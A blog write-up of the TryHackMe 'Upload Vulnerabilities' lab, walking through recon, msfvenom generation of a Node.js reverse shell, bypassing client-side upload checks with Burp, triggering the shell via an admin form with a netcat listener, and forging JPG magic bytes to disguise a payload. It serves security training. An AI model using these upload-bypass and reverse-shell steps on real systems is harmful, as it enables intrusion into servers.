Kamil Gierach-Pacanek
CyberEthical.Me: Hacking for the Security Awareness

CyberEthical.Me: Hacking for the Security Awareness

THM Upload Vulnerabilities

THM Upload Vulnerabilities

Write-up for Upload Vulnerabilities room at TryHackMe

Kamil Gierach-Pacanek's photo
Kamil Gierach-Pacanek

Published on Aug 16, 2021

4 min read

Subscribe to my newsletter and never miss my upcoming articles

Basic Information

#
TypeTHM Room Challenge
Organized byTryHackMe
NameTHM / Upload Vulnerabilities
URLstryhackme.com/room/uploadvulns
AuthorAsentinn / Okabe Rintaro
ctftime.org/team/152207

πŸ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or 🎁 become a Patron which also gives you some bonus perks.
Join our Discord Server!


Contents


Recon

I'm pulling the provided wordlist for the challenge.

2021-08-08-15-34-20.png

2021-08-08-15-36-29.png

I'm already having the /etc/hosts entry for jewel.uploadvulns.thm so I'm accessing the page in browser.

If do not, add the entry with room IP

$ sudo nano /etc/hosts

{IP} jewel.uploadvulns.thm

2021-08-08-15-37-52.png

Running whatweb

$ whatweb jewel.uploadvulns.thm

2021-08-08-15-39-04.png

We are dealing with the Node.JS Express backend. In the source of the page, there is a reference to the upload.js script file.

2021-08-08-15-41-45.png

Client-side validation can be easily worked around by passing the traffic through a Burp proxy and cutting the script import before it is rendered. In a real case scenario, backend validation should be at least as restrictive as client one, so it is good we can note down what files are supposed to be allowed or denied.

But first discover directories on the website

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://jewel.uploadvulns.thm/FUZZ

2021-08-08-22-06-04.png

Back to top ‴

Client-side file upload restrictions

Let's try right away the NodeJS web shell

$ msfvenom -p nodejs/shell_reverse_tcp LHOST=tun0 LPORT=4455 -o shell.js

2021-08-08-15-58-56.png

MiM attack with request modification

We can sniff the upload request being made via Burp on a legit file.

2021-08-08-22-02-15.png

Content is base64 encoded - so let's encode the shell.js file content and paste into Repeater - send it and voilΓ  - we have the reverse shell file on the website.

2021-08-08-22-00-55.png

Back to top ‴

Fuzzing

We can see that existing backgrounds are named using free letter filename like ABH.jpg or AVK.jpg. Now, we can make assumption that any file that passes the upload are placed together with these backgrounds with name conforming to that rules.

On the main page we can read Upload it here and we'll add it to the slides!

Fuzzing the content directory, we can see multiple files, and a few that have ~800 bytes - these are our payloads.

There are multiple files uploaded because I was trying different uploads before I found the right one. See the Bonus content

$ ffuf -w UploadVulnsWordlist.txt:FUZZ -u http://jewel.uploadvulns.thm/content/FUZZ -e .jpg

2021-08-08-21-41-14.png

Other files with 800 and 799 bytes size are my previous attempts.

$ curl http://jewel.uploadvulns.thm/content/HRH.jpg

2021-08-08-21-40-42.png

When you try accessing the shell directly

2021-08-08-22-07-39.png

But during the directory fuzzing we have discovered the admin directory.

Back to top ‴

/admin

2021-08-08-17-19-15.png

Can we access the file via this form?

2021-08-08-21-42-32.png

Before making a request, start the listener with nc -lvnp {PORT} and submit the form on /admin.

2021-08-08-21-42-19.png

Yes, indeed.

image.png

Do you like what you see? Join the Hashnode.com now and start publishing. Things that are awesome:

βœ” Automatic GitHub Backup

βœ” Write in Markdown

βœ” Free domain mapping

βœ” CDN hosted images

βœ” Free built-in newsletter service

βœ” Built-in blog monetizing through the Sponsor feature

By using my link, you can help me unlock the ambassador role, which cost you nothing and gives me some additional features to support my content creation mojo.

Back to top ‴

Additional readings

πŸ“Œ Follow the #CyberEthical hashtag on the social media

🎁 Become a Patron and gain additional benefits

πŸ‘‰ Instagram: @cyber.ethical.me

πŸ‘‰ LinkedIn: Kamil Gierach-Pacanek

πŸ‘‰ Twitter: @cyberethical_me

πŸ‘‰ Facebook: @CyberEthicalMe

Bonus: hiding malicious code behind JPG signature

Forging a JPG/JPEG file requires a file to start with magic number FF D8 FF.

2021-08-08-15-45-40.png

  1. Edit payload: prepend AAA at the beginning of the file

  2. Edit the payload in hexedit replacing first octets with FF D8 FF.

Before:

2021-08-08-21-56-06.png 2021-08-08-21-56-48.png

After:

2021-08-08-21-59-21.png 2021-08-08-21-57-30.png

2021-08-08-16-39-33.png

Back to top ‴

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!

See recent sponsors |Β Learn more about Hashnode Sponsors
Β 
Share this